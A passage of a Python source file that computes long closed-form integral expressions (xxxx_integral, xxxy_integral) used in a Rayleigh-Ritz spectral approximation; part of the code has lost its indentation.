        return 4 * c * np.pi * ret
    # degenerate a -> 0, b -> 1 limit
    if abs(a_conj) < 0.00000001 and (b - 1) ** 2 < 0.00000001:
        ret = x ** 2 * (1 + x ** 4) / (2 * (1 + x ** 2) ** 4)
        return 4 * c * np.pi * ret
def xxxx_integral(a, b, c, x):
"""
function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)
@param a:
@param b:
@param c:
@param x:
@return:
"""
a_conj = np.conj(a)
if abs(a_conj) >= 0.00000001:
ret = (
1
/ (12 * a ** 4 * a_conj ** 4)
* (
3 * a ** 4
+ 2 * a ** 5 * a_conj
- 4 * a ** 4 * a_conj ** 2
+ 3 * a ** 6 * a_conj ** 2
+ 3 * a_conj ** 4
+ 2 * a ** 2 * a_conj ** 4
+ 2 * a * a_conj ** 5
+ 3 * a ** 2 * a_conj ** 6
+ 9 * (a ** 4 + a_conj ** 4)
+ 9 * a_conj ** 4 * (-1 + b)
- 6 * a ** 4 * b
+ 6 * a ** 5 * a_conj * b
- 6 * a_conj ** 4 * b
+ 6 * a * a_conj ** 5 * b
+ 3 * a ** 4 * b ** 2
+ 3 * a_conj ** 4 * b ** 2
+ a ** 4 * (-9 + 6 * a_conj ** 2 + 9 * b)
- 1
/ (
b
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
** 4
)
* (
np.sqrt((a * a_conj + b) ** 2)
* (
3 * a ** 13 * a_conj ** 9 * b
+ 3 * a_conj ** 4 * (-1 + b) ** 7 * b ** 3
+ a ** 12 * a_conj ** 8 * b * (26 + 27 * b)
+ a
* a_conj ** 5
* (-1 + b) ** 5
* b ** 2
* (9 + 14 * b + 27 * b ** 2)
+ a ** 11
* a_conj ** 7
* (
-3
+ (103 + 2 * a_conj ** 2) * b
+ 161 * b ** 2
+ 108 * b ** 3
)
+ a ** 10
* a_conj ** 6
* (
-12
+ 251 * b
+ 409 * b ** 2
+ 399 * b ** 3
+ 252 * b ** 4
+ 2 * a_conj ** 2 * (-6 + 8 * b + 7 * b ** 2)
)
+ a ** 9
* a_conj ** 5
* (
-18
+ 175 * b
+ 2 * a_conj ** 6 * b
+ 3 * a_conj ** 8 * b
+ 601 * b ** 2
+ 563 * b ** 3
+ 469 * b ** 4
+ 378 * b ** 5
- 6 * a_conj ** 4 * (3 + 2 * b)
+ a_conj ** 2 * (-48 + 266 * b + 64 * b ** 2 + 42 * b ** 3)
)
+ a ** 8
* a_conj ** 4
* (
-12
- 112 * b
+ 307 * b ** 2
+ 407 * b ** 3
+ 285 * b ** 4
+ 175 * b ** 5
+ 378 * b ** 6
+ a_conj ** 8 * b * (26 + 27 * b)
+ 2 * a_conj ** 6 * (-6 + 8 * b + 7 * b ** 2)
- 6 * a_conj ** 4 * (12 - 55 * b + 10 * b ** 2)
+ a_conj ** 2
* (-72 + 88 * b + 754 * b ** 2 + 80 * b ** 3 + 70 * b ** 4)
)
+ a ** 2
* a_conj ** 4
* b
* (
2 * (-3 + b) * (-1 + b) ** 5 * b
+ a_conj ** 2
* (-1 + b) ** 3
* (9 + 70 * b + 74 * b ** 2 + 65 * b ** 3 + 108 * b ** 4)
)
+ a ** 7
* a_conj ** 3
* (
-3
- 125 * b
- 181 * b ** 2
+ 96 * b ** 3
+ 65 * b ** 4
+ 85 * b ** 5
- 189 * b ** 6
+ 252 * b ** 7
- 12
* a_conj ** 4
* (9 - 13 * b - 78 * b ** 2 + 10 * b ** 3)
+ a_conj ** 6 * (-48 + 266 * b + 64 * b ** 2 + 42 * b ** 3)
+ a_conj ** 8 * (-3 + 103 * b + 161 * b ** 2 + 108 * b ** 3)
+ a_conj ** 2
* (
-48
- 538 * b
+ 736 * b ** 2
+ 596 * b ** 3
+ 70 * b ** 5
)
)
+ a ** 5
* (
a_conj * (-1 + b) ** 5 * b ** 2 * (9 + 14 * b + 27 * b ** 2)
+ 2
* a_conj ** 3
* (-1 + b) ** 3
* b
* (-15 - 37 * b - 11 * b ** 2 + 7 * b ** 3)
- 6
* a_conj ** 5
* (
3
+ 60 * b
+ 128 * b ** 2
- 218 * b ** 3
+ 17 * b ** 4
+ 10 * b ** 5
)
+ a_conj ** 7
* (
-48
- 538 * b
+ 736 * b ** 2
+ 596 * b ** 3
+ 70 * b ** 5
)
+ a_conj ** 9
* (
-18
+ 175 * b
+ 601 * b ** 2
+ 563 * b ** 3
+ 469 * b ** 4
+ 378 * b ** 5
)
)
+ a ** 6
* a_conj ** 2
* (
-12
* a_conj ** 4
* (6 + 53 * b - 89 * b ** 2 - 54 * b ** 3 + 10 * b ** 4)
+ a_conj ** 6
* (-72 + 88 * b + 754 * b ** 2 + 80 * b ** 3 + 70 * b ** 4)
+ (-1 + b) ** 3
* b
* (9 + 70 * b + 74 * b ** 2 + 65 * b ** 3 + 108 * b ** 4)
+ a_conj ** 8
* (
-12
+ 251 * b
+ 409 * b ** 2
+ 399 * b ** 3
+ 252 * b ** 4
)
+ 2
* a_conj ** 2
* (
-6
- 172 * b
- 251 * b ** 2
+ 396 * b ** 3
+ 52 * b ** 4
- 40 * b ** 5
+ 21 * b ** 6
)
)
+ a ** 3
* a_conj ** 5
* (-1 + b)
* (
2
* (-1 + b) ** 2
* b
* (-15 - 37 * b - 11 * b ** 2 + 7 * b ** 3)
+ a_conj ** 2
* (
3
+ 128 * b
+ 309 * b ** 2
+ 213 * b ** 3
+ 148 * b ** 4
+ 63 * b ** 5
+ 252 * b ** 6
)
)
+ a ** 4
* (
2 * a_conj ** 2 * (-3 + b) * (-1 + b) ** 5 * b ** 2
+ 3 * (-1 + b) ** 7 * b ** 3
- 6
* a_conj ** 4
* (-1 + b) ** 3
* b
* (15 + 33 * b + 2 * b ** 2)
+ 2
* a_conj ** 6
* (
-6
- 172 * b
- 251 * b ** 2
+ 396 * b ** 3
+ 52 * b ** 4
- 40 * b ** 5
+ 21 * b ** 6
)
+ a_conj ** 8
* (
-12
- 112 * b
+ 307 * b ** 2
+ 407 * b ** 3
+ 285 * b ** 4
+ 175 * b ** 5
+ 378 * b ** 6
)
)
)
)
+ (
-3 * a ** 6 * a_conj ** 2
+ a ** 2 * (4 * a_conj ** 4 - 3 * a_conj ** 6)
+ a ** 4 * (4 * a_conj ** 2 - 3 * (-1 + b) ** 2)
+ a ** 5 * a_conj * (4 - 6 * b)
+ 2 * a * a_conj ** 5 * (2 - 3 * b)
- 3 * a_conj ** 4 * (-1 + b) ** 2
)
/ (1 + x ** 2) ** 3
- 3
* (
2 * a ** 5 * a_conj
+ 2 * a ** 2 * a_conj ** 4
+ 2 * a * a_conj ** 5
+ 3 * a_conj ** 4 * (-1 + b)
+ a ** 4 * (-3 + 2 * a_conj ** 2 + 3 * b)
)
/ (1 + x ** 2) ** 2
- 9 * (a ** 4 + a_conj ** 4) / (1 + x ** 2)
+ 1
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** 4
* (
np.sqrt(-4 * a * a_conj * x ** 2 + (a * a_conj + b + x ** 2) ** 2)
* (
1
/ (1 + x ** 2) ** 3
* (
(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
** 2
* (
3 * a ** 9 * a_conj ** 5
+ 3 * a_conj ** 4 * (-1 + b) ** 5
+ 5 * a ** 8 * a_conj ** 4 * (1 + 3 * b)
+ 5 * a * a_conj ** 5 * (-1 + b) ** 3 * (1 + 3 * b)
+ a ** 7
* (-4 * a_conj ** 5 + 30 * a_conj ** 3 * b ** 2)
+ 6
* a ** 3
* a_conj ** 5
* (2 + (-2 + 5 * a_conj ** 2) * b ** 2)
+ 2
* a ** 2
* a_conj ** 4
* (-1 + b)
* (-2 + 4 * b + (-2 + 15 * a_conj ** 2) * b ** 2)
- 6
* a ** 6
* (
-5 * a_conj ** 2 * (-1 + b) * b ** 2
+ 2 * a_conj ** 4 * (1 + b)
)
+ a ** 4
* (
-12 * a_conj ** 4 * (-1 + b)
- 4 * a_conj ** 2 * (-1 + b) ** 3
+ 3 * (-1 + b) ** 5
- 12 * a_conj ** 6 * (1 + b)
+ 5 * a_conj ** 8 * (1 + 3 * b)
)
+ a ** 5
* (
-12 * a_conj ** 5
- 4 * a_conj ** 7
+ 3 * a_conj ** 9
+ 5 * a_conj * (-1 + b) ** 3 * (1 + 3 * b)
- 12 * a_conj ** 3 * (-1 + b ** 2)
)
)
)
+ 1
/ (1 + x ** 2) ** 2
* (
(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
* (
9 * a ** 10 * a_conj ** 6
+ 6 * a_conj ** 4 * (-1 + b) ** 6
+ a * a_conj ** 5 * (-1 + b) ** 4 * (31 + 39 * b)
+ a ** 9 * a_conj ** 5 * (29 + 6 * a_conj ** 2 + 51 * b)
+ 2
* a ** 8
* (
a_conj ** 6 * (13 + 15 * b)
+ 5 * a_conj ** 4 * (2 + 7 * b + 12 * b ** 2)
)
+ a ** 2
* (
2 * a_conj ** 4 * (-1 + b) ** 4 * (-1 + 3 * b)
+ 5
* a_conj ** 6
* (-1 + b) ** 2
* (11 + 16 * b + 21 * b ** 2)
)
+ 2
* a ** 7
* a_conj ** 3
* (
15
+ 18 * a_conj ** 4
+ 3 * a_conj ** 6
+ 75 * b ** 3
+ a_conj ** 2 * (-32 + 26 * b + 30 * b ** 2)
)
+ a ** 5
* (
a_conj * (-1 + b) ** 4 * (31 + 39 * b)
+ a_conj ** 9 * (29 + 51 * b)
+ 36 * a_conj ** 5 * (-2 - 3 * b + 3 * b ** 2)
+ 2
* a_conj ** 3
* (-1 + b) ** 2
* (-7 + 4 * b + 15 * b ** 2)
+ a_conj ** 7 * (-64 + 52 * b + 60 * b ** 2)
)
+ 2
* a ** 3
* (
a_conj ** 5
* (-1 + b) ** 2
* (-7 + 4 * b + 15 * b ** 2)
+ 15 * a_conj ** 7 * (1 + 5 * b ** 3)
)
+ a ** 6
* a_conj ** 2
* (
9 * a_conj ** 8
+ 12 * a_conj ** 4 * (-4 + 9 * b)
+ a_conj ** 6 * (26 + 30 * b)
+ 5 * (-1 + b) ** 2 * (11 + 16 * b + 21 * b ** 2)
+ 12 * a_conj ** 2 * (-8 - 9 * b + 5 * b ** 3)
)
+ 2
* a ** 4
* (
3 * (-1 + b) ** 6
+ a_conj ** 2 * (-1 + b) ** 4 * (-1 + 3 * b)
+ 6 * a_conj ** 4 * (-1 + b) ** 2 * (1 + 3 * b)
+ 5 * a_conj ** 8 * (2 + 7 * b + 12 * b ** 2)
+ 6 * a_conj ** 6 * (-8 - 9 * b + 5 * b ** 3)
)
)
)
+ 1
/ (1 + x ** 2)
* (
18 * a ** 11 * a_conj ** 7
+ 3 * a_conj ** 4 * (-1 + b) ** 7
+ 2 * a * a_conj ** 5 * (-1 + b) ** 5 * (13 + 12 * b)
+ a ** 10 * a_conj ** 6 * (101 + 6 * a_conj ** 2 + 99 * b)
- 2
* a ** 9
* a_conj ** 5
* (
-29
+ 18 * a_conj ** 4
- 167 * b
- 114 * b ** 2
- 4 * a_conj ** 2 * (31 + 3 * b)
)
+ a ** 2
* a_conj ** 4
* (-1 + b) ** 3
* (
-2 * (-1 + b) ** 2 * (-1 + 3 * b)
+ a_conj ** 2 * (103 + 154 * b + 93 * b ** 2)
)
+ 2
* a ** 3
* a_conj ** 5
* (-1 + b)
* (
-4 * (-1 + b) ** 2 * (-2 + b + 3 * b ** 2)
+ 5
* a_conj ** 2
* (23 + 29 * b + 29 * b ** 2 + 21 * b ** 3)
)
+ a ** 8
* a_conj ** 4
* (
6 * a_conj ** 6
- 36 * a_conj ** 4 * (-6 + 5 * b)
+ a_conj ** 2 * (322 + 712 * b + 30 * b ** 2)
+ 5 * (-35 + 37 * b + 73 * b ** 2 + 57 * b ** 3)
)
+ a ** 6
* a_conj ** 2
* (
a_conj ** 8 * (101 + 99 * b)
+ a_conj ** 6 * (322 + 712 * b + 30 * b ** 2)
+ (-1 + b) ** 3 * (103 + 154 * b + 93 * b ** 2)
- 12
* a_conj ** 4
* (13 - 63 * b - 54 * b ** 2 + 30 * b ** 3)
- 2
* a_conj ** 2
* (
91
+ 180 * b
- 162 * b ** 2
- 124 * b ** 3
+ 15 * b ** 4
)
)
- a ** 4
* (
-3 * (-1 + b) ** 7
+ 2 * a_conj ** 2 * (-1 + b) ** 5 * (-1 + 3 * b)
+ 12
* a_conj ** 4
* (-1 + b) ** 3
* (1 + 9 * b + 3 * b ** 2)
- 5
* a_conj ** 8
* (-35 + 37 * b + 73 * b ** 2 + 57 * b ** 3)
+ 2
* a_conj ** 6
* (
91
+ 180 * b
- 162 * b ** 2
- 124 * b ** 3
+ 15 * b ** 4
)
)
+ 2
* a ** 5
* (
a_conj * (-1 + b) ** 5 * (13 + 12 * b)
- 4
* a_conj ** 3
* (-1 + b) ** 3
* (-2 + b + 3 * b ** 2)
+ 4 * a_conj ** 7 * (-11 + 76 * b + 85 * b ** 2)
+ a_conj ** 9 * (29 + 167 * b + 114 * b ** 2)
- 6
* a_conj ** 5
* (
17
+ 40 * b
- 54 * b ** 2
- 18 * b ** 3
+ 15 * b ** 4
)
)
+ 2
* a ** 7
* a_conj ** 3
* (
9 * a_conj ** 8
+ 4 * a_conj ** 6 * (31 + 3 * b)
+ a_conj ** 4 * (156 + 324 * b - 180 * b ** 2)
+ 4 * a_conj ** 2 * (-11 + 76 * b + 85 * b ** 2)
+ 5 * (-23 - 6 * b + 8 * b ** 3 + 21 * b ** 4)
)
)
- 1
/ (
b
* (
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (b - x ** 2)
+ (b + x ** 2) ** 2
)
)
* (
3
* a ** 2
* a_conj ** 2
* (a + a_conj) ** 4
* (
a ** 7 * a_conj ** 7
- a ** 6 * a_conj ** 6 * (-4 + 5 * b + x ** 2)
+ a ** 5
* a_conj ** 5
* (6 - 35 * b ** 2 - 4 * x ** 2 - 2 * b * (-4 + x ** 2))
+ a ** 4
* a_conj ** 4
* (
4
- 65 * b ** 3
- 6 * x ** 2
+ b * (30 - 20 * x ** 2)
+ 5 * b ** 2 * (-4 + x ** 2)
)
+ (-1 + b) ** 3
* b ** 2
* (5 * b ** 2 + 5 * x ** 2 + 3 * b * (1 + x ** 2))
+ a ** 3
* a_conj ** 3
* (
1
- 45 * b ** 4
- 4 * x ** 2
+ b ** 2 * (60 - 40 * x ** 2)
+ 20 * b ** 3 * (-4 + x ** 2)
- 8 * b * (-2 + 3 * x ** 2)
)
+ a ** 2
* a_conj ** 2
* (
b ** 5
- x ** 2
+ b ** 3 * (60 - 40 * x ** 2)
+ b ** 2 * (24 - 36 * x ** 2)
+ 25 * b ** 4 * (-4 + x ** 2)
+ b * (-1 + 4 * x ** 2)
)
+ a
* a_conj
* (-1 + b)
* b
* (
15 * b ** 4
- 10 * x ** 2
+ b * (5 - 30 * x ** 2)
- b ** 2 * (11 + 6 * x ** 2)
+ b ** 3 * (-41 + 14 * x ** 2)
)
)
)
)
)
+ 1
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
* (
24
* a ** 4
* a_conj ** 4
* (1 + a * a_conj + b)
* (
a ** 6 * a_conj ** 2 * (-5 + 3 * a_conj ** 2)
- 3 * (-1 + b) ** 4 * b
- 5 * a_conj ** 4 * (1 + 5 * b + b ** 2)
+ 3 * a_conj ** 2 * (-1 + b) ** 2 * (1 + 8 * b + b ** 2)
+ 2
* a ** 5
* (
3 * a_conj ** 5
- 5 * a_conj * (1 + b)
+ a_conj ** 3 * (-4 + 6 * b)
)
+ 4
* a ** 3
* a_conj
* (
-2
- 13 * b
+ 7 * b ** 2
+ 3 * b ** 3
+ a_conj ** 4 * (-2 + 3 * b)
+ 3 * a_conj ** 2 * (-2 + b + 2 * b ** 2)
)
+ a ** 4
* (
3 * a_conj ** 6
+ 3 * a_conj ** 4 * (-2 + 7 * b)
- 5 * (1 + 5 * b + b ** 2)
+ 2 * a_conj ** 2 * (-11 + b + 9 * b ** 2)
)
- 2
* a
* (
5 * a_conj ** 5 * (1 + b)
+ 3 * a_conj * (-1 + b) ** 2 * (-1 - 6 * b + b ** 2)
+ a_conj ** 3 * (4 + 26 * b - 14 * b ** 2 - 6 * b ** 3)
)
+ a ** 2
* (
-5 * a_conj ** 6
+ 3 * (-1 + b) ** 2 * (1 + 8 * b + b ** 2)
+ 2 * a_conj ** 4 * (-11 + b + 9 * b ** 2)
+ 6 * a_conj ** 2 * (-1 - 12 * b + 9 * b ** 2 + b ** 3)
)
)
* np.log(
a * a_conj
- b
+ (a * a_conj + b) ** 2
+ np.sqrt((a * a_conj + b) ** 2)
* np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
)
)
+ 1
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
* (
24
* a ** 4
* a_conj ** 4
* (1 + a * a_conj + b)
* (
a ** 6 * a_conj ** 2 * (-5 + 3 * a_conj ** 2)
- 3 * (-1 + b) ** 4 * b
- 5 * a_conj ** 4 * (1 + 5 * b + b ** 2)
+ 3 * a_conj ** 2 * (-1 + b) ** 2 * (1 + 8 * b + b ** 2)
+ 2
* a ** 5
* (
3 * a_conj ** 5
- 5 * a_conj * (1 + b)
+ a_conj ** 3 * (-4 + 6 * b)
)
+ 4
* a ** 3
* a_conj
* (
-2
- 13 * b
+ 7 * b ** 2
+ 3 * b ** 3
+ a_conj ** 4 * (-2 + 3 * b)
+ 3 * a_conj ** 2 * (-2 + b + 2 * b ** 2)
)
+ a ** 4
* (
3 * a_conj ** 6
+ 3 * a_conj ** 4 * (-2 + 7 * b)
- 5 * (1 + 5 * b + b ** 2)
+ 2 * a_conj ** 2 * (-11 + b + 9 * b ** 2)
)
- 2
* a
* (
5 * a_conj ** 5 * (1 + b)
+ 3 * a_conj * (-1 + b) ** 2 * (-1 - 6 * b + b ** 2)
+ a_conj ** 3 * (4 + 26 * b - 14 * b ** 2 - 6 * b ** 3)
)
+ a ** 2
* (
-5 * a_conj ** 6
+ 3 * (-1 + b) ** 2 * (1 + 8 * b + b ** 2)
+ 2 * a_conj ** 4 * (-11 + b + 9 * b ** 2)
+ 6 * a_conj ** 2 * (-1 - 12 * b + 9 * b ** 2 + b ** 3)
)
)
* np.log(1 + x ** 2)
)
- 1
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
* (
24
* a ** 4
* a_conj ** 4
* (1 + a * a_conj + b)
* (
a ** 6 * a_conj ** 2 * (-5 + 3 * a_conj ** 2)
- 3 * (-1 + b) ** 4 * b
- 5 * a_conj ** 4 * (1 + 5 * b + b ** 2)
+ 3 * a_conj ** 2 * (-1 + b) ** 2 * (1 + 8 * b + b ** 2)
+ 2
* a ** 5
* (
3 * a_conj ** 5
- 5 * a_conj * (1 + b)
+ a_conj ** 3 * (-4 + 6 * b)
)
+ 4
* a ** 3
* a_conj
* (
-2
- 13 * b
+ 7 * b ** 2
+ 3 * b ** 3
+ a_conj ** 4 * (-2 + 3 * b)
+ 3 * a_conj ** 2 * (-2 + b + 2 * b ** 2)
)
+ a ** 4
* (
3 * a_conj ** 6
+ 3 * a_conj ** 4 * (-2 + 7 * b)
- 5 * (1 + 5 * b + b ** 2)
+ 2 * a_conj ** 2 * (-11 + b + 9 * b ** 2)
)
- 2
* a
* (
5 * a_conj ** 5 * (1 + b)
+ 3 * a_conj * (-1 + b) ** 2 * (-1 - 6 * b + b ** 2)
+ a_conj ** 3 * (4 + 26 * b - 14 * b ** 2 - 6 * b ** 3)
)
+ a ** 2
* (
-5 * a_conj ** 6
+ 3 * (-1 + b) ** 2 * (1 + 8 * b + b ** 2)
+ 2 * a_conj ** 4 * (-11 + b + 9 * b ** 2)
+ 6 * a_conj ** 2 * (-1 - 12 * b + 9 * b ** 2 + b ** 3)
)
)
* np.log(
a * a_conj
- b
+ (a * a_conj + b) ** 2
- x ** 2
- a * a_conj * x ** 2
+ b * x ** 2
+ np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
* np.sqrt(
-4 * a * a_conj * x ** 2 + (a * a_conj + b + x ** 2) ** 2
)
)
)
)
)
return 4 * np.pi * c * ret
if abs(a_conj) < 0.00000001 and abs(b - 1) ** 2 >= 0.00000001:
ret = (
(-1 + b) ** 3
+ 3 * (-1 + b) * b
- 3 * (-1 + b) ** 2 * b
+ 3 * (-1 + b) * b * (2 + b)
- (-1 + b) ** 3 / (1 + x ** 2) ** 3
+ 3 * (-1 + b) ** 2 * b / (1 + x ** 2) ** 2
- 3 * (-1 + b) * b * (2 + b) / (1 + x ** 2)
- 3 * (-1 + b) * b ** 2 / (b + x ** 2)
- 6 * b * (1 + b) * np.log(b)
+ 6 * b * (1 + b) * np.log(b + x ** 2)
- 6 * b * (1 + b) * np.log(1 + x ** 2)
) / (6 * (-1 + b) ** 5)
return 24 * np.pi * c * ret # 12 as integral of 2cos^4 is 12pi
if abs(a_conj) < 0.00000001 and abs(b - 1) ** 2 < 0.00000001:
ret = x ** 6 * (10 + 5 * x ** 2 + x ** 4) / (60 * (1 + x ** 2) ** 5)
return 24 * np.pi * c * ret
def xxxy_integral(a, b, c, x):
    """
    Function involved in computing the a_matrix (Rayleigh-Ritz approximation
    of the spectrum): closed-form value of the <x x x y>-type moment integral.

    The body is one enormous machine-generated algebraic expression
    (presumably exported from a computer-algebra system) -- do not edit the
    formula by hand; regenerate it instead.

    @param a: complex parameter; its conjugate ``np.conj(a)`` drives both the
        branch selection and the formula
    @param b: scalar parameter of the integrand (presumably real -- TODO
        confirm; sibling branches in this file test ``(b - 1) ** 2``)
    @param c: overall multiplicative constant applied to the result
    @param x: cut-off / integration variable; enters only through powers of
        ``x ** 2``
    @return: ``4 / 1j * np.pi * c * ret`` in the generic branch; ``0`` when
        ``|np.conj(a)|`` is below the 1e-8 tolerance
    """
    a_conj = np.conj(a)  # conjugate of a; branching is on its magnitude
    # Generic branch: a is numerically non-zero (tolerance 1e-8).
    if abs(a_conj) >= 0.00000001:
        ret = (
            1
            / 12
            * (a ** 2 - a_conj ** 2)
            * (
                9 * (a ** 2 + a_conj ** 2) / (a ** 4 * a_conj ** 4)
                + (
                    3 * a ** 4 * a_conj ** 2
                    + a ** 2 * (-2 * a_conj ** 2 + 3 * a_conj ** 4 + 3 * (-1 + b) ** 2)
                    + 3 * a_conj ** 2 * (-1 + b) ** 2
                    + 2 * a ** 3 * a_conj * (-2 + 3 * b)
                    + 2 * a * a_conj ** 3 * (-2 + 3 * b)
                )
                / (a ** 4 * a_conj ** 4)
                + (
                    6 * a ** 3 * a_conj
                    + 6 * a * a_conj ** 3
                    + 9 * a_conj ** 2 * (-1 + b)
                    + 3 * a ** 2 * (-3 + a_conj ** 2 + 3 * b)
                )
                / (a ** 4 * a_conj ** 4)
                - 1
                / (
                    a ** 4
                    * a_conj ** 4
                    * b
                    * (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
                    ** 4
                )
                * (
                    np.sqrt((a * a_conj + b) ** 2)
                    * (
                        3 * a ** 11 * a_conj ** 9 * b
                        + 3 * a_conj ** 2 * (-1 + b) ** 7 * b ** 3
                        + a ** 10 * a_conj ** 8 * b * (26 + 27 * b)
                        + a
                        * a_conj ** 3
                        * (-1 + b) ** 5
                        * b ** 2
                        * (9 + 14 * b + 27 * b ** 2)
                        + a ** 9
                        * a_conj ** 7
                        * (
                            -3
                            + (103 + a_conj ** 2 + 3 * a_conj ** 4) * b
                            + 161 * b ** 2
                            + 108 * b ** 3
                        )
                        + a ** 8
                        * a_conj ** 6
                        * (
                            -12
                            + 251 * b
                            + 409 * b ** 2
                            + 399 * b ** 3
                            + 252 * b ** 4
                            + a_conj ** 4 * b * (26 + 27 * b)
                            + a_conj ** 2 * (-6 + 8 * b + 7 * b ** 2)
                        )
                        + a ** 7
                        * a_conj ** 5
                        * (
                            -18
                            + 175 * b
                            + 601 * b ** 2
                            + 563 * b ** 3
                            + 469 * b ** 4
                            + 378 * b ** 5
                            + a_conj ** 2 * (-24 + 133 * b + 32 * b ** 2 + 21 * b ** 3)
                            + a_conj ** 4 * (-3 + 103 * b + 161 * b ** 2 + 108 * b ** 3)
                        )
                        + a ** 2
                        * b
                        * (
                            a_conj ** 2 * (-3 + b) * (-1 + b) ** 5 * b
                            + 3 * (-1 + b) ** 7 * b ** 2
                            + a_conj ** 4
                            * (-1 + b) ** 3
                            * (9 + 70 * b + 74 * b ** 2 + 65 * b ** 3 + 108 * b ** 4)
                        )
                        + a ** 6
                        * a_conj ** 4
                        * (
                            -12
                            - 112 * b
                            + 307 * b ** 2
                            + 407 * b ** 3
                            + 285 * b ** 4
                            + 175 * b ** 5
                            + 378 * b ** 6
                            + a_conj ** 2
                            * (-36 + 44 * b + 377 * b ** 2 + 40 * b ** 3 + 35 * b ** 4)
                            + a_conj ** 4
                            * (
                                -12
                                + 251 * b
                                + 409 * b ** 2
                                + 399 * b ** 3
                                + 252 * b ** 4
                            )
                        )
                        + a ** 5
                        * a_conj ** 3
                        * (
                            -3
                            - 125 * b
                            - 181 * b ** 2
                            + 96 * b ** 3
                            + 65 * b ** 4
                            + 85 * b ** 5
                            - 189 * b ** 6
                            + 252 * b ** 7
                            + a_conj ** 2
                            * (
                                -24
                                - 269 * b
                                + 368 * b ** 2
                                + 298 * b ** 3
                                + 35 * b ** 5
                            )
                            + a_conj ** 4
                            * (
                                -18
                                + 175 * b
                                + 601 * b ** 2
                                + 563 * b ** 3
                                + 469 * b ** 4
                                + 378 * b ** 5
                            )
                        )
                        + a ** 3
                        * a_conj
                        * (-1 + b)
                        * (
                            (-1 + b) ** 4 * b ** 2 * (9 + 14 * b + 27 * b ** 2)
                            + a_conj ** 2
                            * (-1 + b) ** 2
                            * b
                            * (-15 - 37 * b - 11 * b ** 2 + 7 * b ** 3)
                            + a_conj ** 4
                            * (
                                3
                                + 128 * b
                                + 309 * b ** 2
                                + 213 * b ** 3
                                + 148 * b ** 4
                                + 63 * b ** 5
                                + 252 * b ** 6
                            )
                        )
                        + a ** 4
                        * (
                            a_conj ** 2
                            * (-1 + b) ** 3
                            * b
                            * (9 + 70 * b + 74 * b ** 2 + 65 * b ** 3 + 108 * b ** 4)
                            + a_conj ** 4
                            * (
                                -6
                                - 172 * b
                                - 251 * b ** 2
                                + 396 * b ** 3
                                + 52 * b ** 4
                                - 40 * b ** 5
                                + 21 * b ** 6
                            )
                            + a_conj ** 6
                            * (
                                -12
                                - 112 * b
                                + 307 * b ** 2
                                + 407 * b ** 3
                                + 285 * b ** 4
                                + 175 * b ** 5
                                + 378 * b ** 6
                            )
                        )
                    )
                )
                + (
                    -3 * a ** 4 * a_conj ** 2
                    + a ** 2 * (2 * a_conj ** 2 - 3 * a_conj ** 4 - 3 * (-1 + b) ** 2)
                    + a ** 3 * a_conj * (4 - 6 * b)
                    + 2 * a * a_conj ** 3 * (2 - 3 * b)
                    - 3 * a_conj ** 2 * (-1 + b) ** 2
                )
                / (a ** 4 * a_conj ** 4 * (1 + x ** 2) ** 3)
                - 3
                * (
                    2 * a ** 3 * a_conj
                    + 2 * a * a_conj ** 3
                    + 3 * a_conj ** 2 * (-1 + b)
                    + a ** 2 * (-3 + a_conj ** 2 + 3 * b)
                )
                / (a ** 4 * a_conj ** 4 * (1 + x ** 2) ** 2)
                - 9 * (a ** 2 + a_conj ** 2) / (a ** 4 * a_conj ** 4 * (1 + x ** 2))
                + 1
                / (
                    a ** 4
                    * a_conj ** 4
                    * (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** 4
                )
                * (
                    np.sqrt(
                        (a * a_conj + b) ** 2
                        - 2 * a * a_conj * x ** 2
                        + 2 * b * x ** 2
                        + x ** 4
                    )
                    * (
                        1
                        / (1 + x ** 2) ** 3
                        * (
                            (
                                a ** 2 * a_conj ** 2
                                + (-1 + b) ** 2
                                + 2 * a * a_conj * (1 + b)
                            )
                            ** 2
                            * (
                                3 * a ** 7 * a_conj ** 5
                                + 3 * a_conj ** 2 * (-1 + b) ** 5
                                + 5 * a ** 6 * a_conj ** 4 * (1 + 3 * b)
                                + 5 * a * a_conj ** 3 * (-1 + b) ** 3 * (1 + 3 * b)
                                + a ** 5
                                * (
                                    -2 * a_conj ** 5
                                    + 3 * a_conj ** 7
                                    + 30 * a_conj ** 3 * b ** 2
                                )
                                + a ** 2
                                * (-1 + b)
                                * (
                                    -2 * a_conj ** 2 * (-1 + b) ** 2
                                    + 3 * (-1 + b) ** 4
                                    + 30 * a_conj ** 4 * b ** 2
                                )
                                + a ** 4
                                * (
                                    30 * a_conj ** 2 * (-1 + b) * b ** 2
                                    - 6 * a_conj ** 4 * (1 + b)
                                    + 5 * a_conj ** 6 * (1 + 3 * b)
                                )
                                + a ** 3
                                * (
                                    30 * a_conj ** 5 * b ** 2
                                    + 5 * a_conj * (-1 + b) ** 3 * (1 + 3 * b)
                                    - 6 * a_conj ** 3 * (-1 + b ** 2)
                                )
                            )
                        )
                        + 1
                        / (1 + x ** 2) ** 2
                        * (
                            (
                                a ** 2 * a_conj ** 2
                                + (-1 + b) ** 2
                                + 2 * a * a_conj * (1 + b)
                            )
                            * (
                                9 * a ** 8 * a_conj ** 6
                                + 6 * a_conj ** 2 * (-1 + b) ** 6
                                + a * a_conj ** 3 * (-1 + b) ** 4 * (31 + 39 * b)
                                + a ** 7 * a_conj ** 5 * (29 + 3 * a_conj ** 2 + 51 * b)
                                + a ** 6
                                * (
                                    9 * a_conj ** 8
                                    + a_conj ** 6 * (13 + 15 * b)
                                    + 10 * a_conj ** 4 * (2 + 7 * b + 12 * b ** 2)
                                )
                                + a ** 2
                                * (
